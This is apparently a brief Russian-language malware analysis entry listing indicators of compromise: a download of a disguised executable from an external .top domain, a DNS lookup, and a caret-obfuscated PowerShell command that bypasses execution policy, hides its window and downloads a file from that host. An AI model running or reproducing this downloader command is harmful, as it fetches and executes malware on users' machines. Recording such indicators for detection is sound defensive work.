Техническая информация
- http://www.vopergooda.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwERShELl.^exE ^-^EX^ec^Uti^OnP^oLICy^ B^yp^ASS^ -^nop^rOf^Ile -^w^indoWST^Y^L^E H^I^DD^en^ (^n^E^W-O^bjE^C^t sY^sT^E^m.Net.WEBC^l^IEnt^).^dO^w^nL^OAdFI^L^E('http://www.voper...
- DNS ASK vo###gooda.top
- '<SYSTEM32>\cmd.exe' /c "POwERShELl.^exE ^-^EX^ec^Uti^OnP^oLICy^ B^yp^ASS^ -^nop^rOf^Ile -^w^indoWST^Y^L^E H^I^DD^en^ (^n^E^W-O^bjE^C^t sY^sT^E^m.Net.WEBC^l^IEnt^).^dO^w^nL^OAdFI^L^E('http://www.voper...' (со скрытым окном)